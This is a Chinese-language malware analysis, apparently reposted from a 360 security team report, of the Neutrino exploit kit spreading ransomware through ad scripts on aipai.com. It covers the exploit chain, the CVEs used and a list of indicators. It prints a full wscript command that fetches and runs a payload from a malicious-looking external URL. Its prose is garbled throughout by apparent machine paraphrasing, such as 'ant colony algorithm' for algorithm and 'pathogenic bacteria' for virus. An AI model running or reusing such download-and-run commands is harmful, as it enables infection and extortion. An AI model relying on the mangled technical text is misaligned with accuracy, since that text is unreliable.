EK(Exploitkits)主要是被安全漏洞镜像劫持的黑客工具包。目前流行的EKs大多是用来传播勒索者的致病菌。然而,在过去,国外的EKs很少出现在中国。这个水平是因为这类EKs的网站都上不了。另一方面,中国客户很难为勒索者的致病菌支付BTC保释金,不容易导致“获利”。但近日,360安全卓越团队检测到国外攻击包镜像劫持并传播了Aipai.com(aipai.com)上勒索者的致病菌,也就是著名的中微子(NeutrinoEK)。
一、网页图片劫持的全过程
逛爱拍的时候。com,我们会一直按照HXXP://apas.aipai.com/www/delivery/ajs.PHP加载广告js脚本,而这个js就是一切的罪魁祸首。一旦返回的脚本是hxxp://if.eagleholic.com/degraded/satellitefactory/header.js,就会加载NeutrinoEK的登陆网页。
图1ajs.php随机加载js
可能是因为NeutrinoEK自己的安全系统,也可能是因为互联网技术。这个js脚本每次都打不开。往往打开就得到空内容或者404。但有时候,一旦成功获取内容,就会进入NeutrinoEK的攻击范围。
图2嵌入在NeutrinoEK中的iframe
js脚本会自动在当前网页中嵌入一个iframe,并加载NeutrinoEK的网站。这个网站基本是一次性的,访问完之后会很快改变。因此,不可能再次复制该网页。
图3NeutrinoEK登陆页面
与其他EK攻击包不同的是,NeutrinoEK的网页非常简洁,只简单加载了一个Flash。这个Flash非常强大,可以区分版本信息,检测一些系统测试地理环境,根据不同的IE和Flash版本信息运行网站漏洞扫描代码。
二、Flash代码分析
得到的Flash只是一个加密的外壳,真正的攻击代码Flash必须解密后才能被看到。反编译的代码包含大量的废代码,以及危害分析。整理后可以发现,解密蚁群算法是RC4,解密密钥存储在一个binaryData结构中。通过多方面的代码分析可以发现,NeutrinoEK使用的所有加密解密蚁群算法都是RC4,解密密钥都比较短。
图4一键下载Flash
Flashshell会把很多binaryData拼在一起,解密得到第二个Falsh文件,然后加载这个Flash,把BinaryData解密的同样的运行配置信息传输给它。解密后的Flash会在一开始加载到js脚本制作中,使用res契约进行一些安全软件和vm虚拟机检查 *** 作过程。
图5软杀vm虚拟机的检测
图6加载不同安全漏洞的脚本
然后根据IE/Flash的版本信息测试结果,释放不同的html/VBScript和Flash进行攻击。这种攻击代码仍然根据RC4加密并存储在binaryData字段中,Html代码已经做得更小,以便更好地减小图像大小。对于发布的Flash,根据SharedObject的方法传入payload的相关参数。
经过进一步的解密分析,以下安全漏洞很重要:
1.CVE-2016-0189
图7Code代码-2016-0189
2.CVE-2014-6332
图8Code代码-2014-6332
3.CVE-2015-8651
图9Code代码-2015-8651
4.CVE-2016-1019
图10Code代码-2016-1019
5.CVE-2016-4117
图11Code代码-2016-4117
第三,释放负荷。
另外,利用上述安全漏洞加载Flash,从而保证shellcode的最终实现。shellcode的主要作用是释放一个js文件,打开wscript实现该文件。实施的命令如下:
wscript.exe//B//E:JScript"C:userspcapdatalocaltempogoss3df.dat""nygqmtbwlr""http://pompeijverblik.paydayloan.uk.com/jewel/health-39224276""Mozilla/4.0(兼容;MSIE8.0WindowsNT6.1三叉戟/4.0;SLCC2。净CLR2.0.50727;。净CLR3.5.30729;。净CLR3.0.30729;媒体中心PC6.0InfoPath.2.NET4.0C.NET4.0E)"
图12Flash发布的js文件
这个js文件是一个非常简洁和混乱的加密代码。脚本制作和运行的基本参数是有效载荷的下载URL、解密密钥和用于一键下载的UserAgent。但是,一键下载的 *** 作程序必须经过解密才能得到最终申请强制执行的PE *** 作程序。最后js脚本制作会打开regsvr32申请注册解密后的PE *** 作程序,最后让PE程序按照这种方法执行。如果可能的话,这个PE文本文档是敲诈者病原体。
图13JS脚本制作三个基本启动参数的应用场景
图14js脚本一键下载要解密的数据信息。
图15详细的解密PE文本文档
图16js脚本制作启动regsvr32以根据注册 *** 作的应用运行解密的PE *** 作程序。
虽然PE已经解密,但是文本文档中仍然包含了很多用于危害分析的废弃说明。开始时, *** 作程序将获得勒索信息和加密密钥PAB。根据互联网技术规范。
图17根据包的第一个字节返回数据信息
图18加载勒索信息和加密密钥的一键下载主页
然后,执行加密 *** 作过程。这个勒索者的 *** 作程序巧妙地避开了系统敏感的本地磁盘,只对其他本地磁盘下的文本文件进行加密,以避开安全软件的控制。加密文件后缀也是从一长串可选文件后缀中选择的。
图19通过绕过c盘只加密其它盘的文本文件。
图20由有意代码识别的待加密文件的后缀
加密文本文件分为两部分,第一部分是PAB中的内容。密钥,第二部分是文本文档的加密内容。
图21加密文件格式
最后,顾客被勒索了2.4BTC。现在比特币的价格波动很大。仅参考写原文时的价格,2.4BTC的价格在10000元左右,算是比较贵的了。
图22加密后桌面背景被伪造。
图23。根据提示找到付费网页。
四。感应
分析了整个过程,不容易发现NeutrinoEK是一个流行的攻击包,水平很高。所有的数据和信息都是加密的,一层一层的,js代码也有一定程度的混杂。发布的敲诈者也用各种招数来规避分析,处处表现出对软分析工作者的抵触,分析难度很高;另外利用很多安全漏洞进行攻击,代码技术水平高,图片劫持通过率高,危害大。
艾派。com的访问量非常大,不过好在客户开镜劫持的概率比较低,不能引起大范围的感情。因为大部分被敲诈者的致病菌加密的文本文档都无法恢复,对受害者的伤害很大。希望相关网站能够严格审查广告,避免对网站地址客户造成负面影响。
图24360拦截Flash网站漏洞扫描攻击(根据Fiddler数据信息播放视频)
目前有各种针对Flash的网站漏洞扫描,各种EK辅助工具也使用各种加密混淆的方法,绕过电脑上的电脑杀毒软件的数据格式扫描器,很难防御。有鉴于此,360安全和浏览器使用QEX控制模块的数据格式扫描器功能,结合动态阻断专业性,防止各类Flash安全漏洞攻击,更有效地防御客户电脑。此外,还建议客户立即升级AdobeFlashPlayer的版本信息,以提高系统对长期已知的安全漏洞的抵抗力。
动词(verb的缩写)附录
l相关文本文档哈希:
853f760678f901a0ff46777c6a68949b
3e7f75ff27E3e5721a90AC9ed32bed73
dcb84dfdc17743b63943b62e03c0c134
lDump中的文本文档
4BFF486E3D7a98e710e82AE7c486b0cc
0aa6502074b83a466262F3f85c929CB7
Fe8332e7fbfc17A8fa1848a86b9DDE21
c236D3EC78fef67f07EB99ed50FBD58e
e5f4a8c574a2147017f193f085304ed7
f0149617e43f1d24c9150e6c204206d
l相关域名URL:
http://pompeijverblik.paydayloan.uk.com
91.220.131.147
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)